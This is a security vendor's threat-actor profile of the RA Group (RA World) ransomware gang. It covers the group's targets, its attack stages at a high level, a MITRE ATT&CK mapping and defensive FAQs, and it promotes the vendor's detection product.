Uncover gaps in your Microsoft Identity Security.
Book an identity exposure gap analysis today.
Threat actors
>
Ransomware Group

RA Group

RA Group, also known as RA World, first surfaced in April 2023, utilizing a custom variant of the Babuk ransomware.

Detect TTPs used by RA Group
Is Your Organization Safe from RA Group’s Attacks?
Background
Targets
TTPs
Detection
FAQs

The Origin of RA Group

RA Group emerged in the early 2020s, gaining notoriety for targeting large corporations and government entities.  

The group's modus operandi involves exploiting vulnerabilities in network security to deploy ransomware, which encrypts the victim's data and demands a ransom, typically in cryptocurrency, for decryption keys.  

RA Group's operations are characterized by a dual-extortion tactic; they not only encrypt the victim's files but also threaten to release sensitive stolen data publicly if their ransom demands are not met. This tactic significantly increases the pressure on victims to comply with their demands.  

Over time, RA Group, now RA World, has refined its techniques, making it one of the more feared ransomware groups in the cybersecurity community.

The Origin of RA Group
Targets

RA Group's Targets

Countries targeted by RA Group

Many of RA Group’s targets were in the US, with a smaller number of attacks occurring in countries such as Germany, India, and Taiwan.

Source: Trend Micro

Industries Targeted by RA Group

The group mainly targets businesses in the healthcare and financial sectors.

Source: Trend Micro

Industries Targeted by RA Group

The group mainly targets businesses in the healthcare and financial sectors.

Source: Trend Micro

RA Group's Victims

To date, more than 86 victims have fallen prey to RA Group’s malicious operations.

Source: ransomware.live

Attack Method

RA Group's Attack Method

Initial Access
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Execution
Exfiltration
Impact
A shadowy figure casting a wide net over a digital landscape filled with various devices such as computers, smartphones, and tablets. The net symbolizes the attacker's attempts to find vulnerabilities or use phishing techniques to gain unauthorized access.

RA Group gains entry into the victim's network through the exploitation of vulnerabilities in unpatched software, exposed remote desktop protocols (RDPs), or via phishing emails.

A digital ladder extending upwards from a basic user icon towards a crown symbolizing administrative privileges. This represents the attacker's efforts to gain higher-level access within the system.

RA Group escalates privileges within the network to gain higher levels of access.

A chameleon blending into a digital background, with zeroes and ones flowing around it. This represents the attacker's ability to avoid detection by security measures, changing tactics to blend in with normal network traffic.
A thief with a lockpick toolkit working on a giant keyhole shaped like a login form, representing the attacker's efforts to steal user credentials to gain unauthorized access.

RA World obtains and leverages credentials to access various parts of the network.

A magnifying glass moving over a digital map of a network, highlighting files, folders, and network connections. This image represents the phase where attackers explore the environment to understand the structure and where valuable data resides.

In the process of moving across the network, RA World identifies critical systems that are essential for the organization’s operations.

A series of interconnected nodes with a shadowy figure moving stealthily between them. This illustrates the attacker's movements within the network, seeking to gain control of additional systems or spread malware.

Once access is gained, RA World uses compromised credentials and internal network tools to navigate laterally across the network.

A large vacuum sucking up files, data icons, and folders into a bag held by a shadowy figure. This image symbolizes the process of gathering valuable data from the target network.
A command prompt window open in front of a digital background, with malicious code being typed out. This represents the phase where attackers execute their malicious payload within the compromised system.

The custom Babuk ransomware is deployed on the network, targeting essential files.

A series of files being funneled through a covert channel out of a computer to a cloud labeled with a skull, symbolizing the unauthorized transfer of data to a location controlled by the attacker.

Sensitive information such as financial records, personally identifiable information (PII), and intellectual property is exfiltrated from the network.

A cracked screen with a digital cityscape in chaos behind it, symbolizing the destructive impact of the cyberattack, such as service disruption, data destruction, or financial loss.

The ransomware encrypts crucial files, making them inaccessible to legitimate users.

A shadowy figure casting a wide net over a digital landscape filled with various devices such as computers, smartphones, and tablets. The net symbolizes the attacker's attempts to find vulnerabilities or use phishing techniques to gain unauthorized access.
Initial Access

RA Group gains entry into the victim's network through the exploitation of vulnerabilities in unpatched software, exposed remote desktop protocols (RDPs), or via phishing emails.

A digital ladder extending upwards from a basic user icon towards a crown symbolizing administrative privileges. This represents the attacker's efforts to gain higher-level access within the system.
Privilege Escalation

RA Group escalates privileges within the network to gain higher levels of access.

A chameleon blending into a digital background, with zeroes and ones flowing around it. This represents the attacker's ability to avoid detection by security measures, changing tactics to blend in with normal network traffic.
Defense Evasion
A thief with a lockpick toolkit working on a giant keyhole shaped like a login form, representing the attacker's efforts to steal user credentials to gain unauthorized access.
Credential Access

RA World obtains and leverages credentials to access various parts of the network.

A magnifying glass moving over a digital map of a network, highlighting files, folders, and network connections. This image represents the phase where attackers explore the environment to understand the structure and where valuable data resides.
Discovery

In the process of moving across the network, RA World identifies critical systems that are essential for the organization’s operations.

A series of interconnected nodes with a shadowy figure moving stealthily between them. This illustrates the attacker's movements within the network, seeking to gain control of additional systems or spread malware.
Lateral Movement

Once access is gained, RA World uses compromised credentials and internal network tools to navigate laterally across the network.

A large vacuum sucking up files, data icons, and folders into a bag held by a shadowy figure. This image symbolizes the process of gathering valuable data from the target network.
Collection
A command prompt window open in front of a digital background, with malicious code being typed out. This represents the phase where attackers execute their malicious payload within the compromised system.
Execution

The custom Babuk ransomware is deployed on the network, targeting essential files.

A series of files being funneled through a covert channel out of a computer to a cloud labeled with a skull, symbolizing the unauthorized transfer of data to a location controlled by the attacker.
Exfiltration

Sensitive information such as financial records, personally identifiable information (PII), and intellectual property is exfiltrated from the network.

A cracked screen with a digital cityscape in chaos behind it, symbolizing the destructive impact of the cyberattack, such as service disruption, data destruction, or financial loss.
Impact

The ransomware encrypts crucial files, making them inaccessible to legitimate users.

MITRE ATT&CK Mapping

TTPs used by RA Group

TA0001: Initial Access
No items found.
TA0002: Execution
No items found.
TA0003: Persistence
No items found.
TA0004: Privilege Escalation
T1484
Group Policy Modification
TA0005: Defense Evasion
T1112
Modify Registry
T1070
Indicator Removal
T1562
Impair Defenses
T1484
Group Policy Modification
TA0006: Credential Access
No items found.
TA0007: Discovery
No items found.
TA0008: Lateral Movement
No items found.
TA0009: Collection
No items found.
TA0011: Command and Control
T1105
Ingress Tool Transfer
TA0010: Exfiltration
No items found.
TA0040: Impact
T1529
System Shutdown/Reboot
T1485
Data Destruction
T1486
Data Encrypted for Impact
Platform Detections

How to Detect RA Group with Vectra AI

AWS Ransomware S3 Activity

M365 Ransomware

Ransomware File Activity

View more detections
Assess your attack exposure

FAQs

What is RA Group/RA World?

RA Group, also known as RA World, is a cybercriminal organization known for executing sophisticated ransomware attacks. They typically target large corporations and government entities.

How does RA Group gain access to networks?

RA Group exploits vulnerabilities such as unpatched software, exposed remote desktop protocols (RDPs), and phishing scams to gain initial access to their targets' networks.

What kind of ransomware does RA Group use?

RA Group is known for using custom-developed ransomware, including variants like Babuk, which encrypts files on infected systems and demands a ransom for decryption keys.

What is the typical ransom demanded by RA Group?

The ransom amount can vary greatly depending on the target and the perceived value of the encrypted data, often ranging from tens to hundreds of thousands of dollars, payable in cryptocurrency.

How does RA Group escalate their attack once inside a network?

After gaining initial access, RA Group typically uses compromised credentials and internal tools to escalate privileges and move laterally across the network to identify and compromise critical systems.

What are the dual-extortion tactics used by RA Group?

RA Group not only encrypts the victim's data but also steals sensitive information. They threaten to release this stolen data publicly if their ransom demands are not met.

How can organizations protect themselves against RA Group attacks?

Organizations should regularly update and patch systems, conduct phishing awareness training, secure RDP access, and use multifactor authentication. Implementing an AI-driven threat detection platform like Vectra AI can also help detect and respond to suspicious activities early.

What should an organization do if it falls victim to an RA Group attack?

Affected organizations should isolate infected systems, initiate their incident response and disaster recovery plans, and report the incident to law enforcement. Engaging with cybersecurity experts for forensic analysis and potential data recovery is also advisable.

Can data encrypted by RA Group be recovered without paying the ransom?

Data recovery without paying the ransom depends on the specific ransomware variant used and the availability of decryption tools. Backups are often the most reliable way to restore encrypted data.

What trends are we seeing with RA Group's activities?

RA Group has been increasingly targeting organizations with high-value data and critical infrastructure, often timing their attacks for maximum disruption. Their methods continue to evolve, incorporating more sophisticated techniques to evade detection and increase their success rate.

Is Your Organization Safe from RA Group’s Attacks?

Assess your attack exposure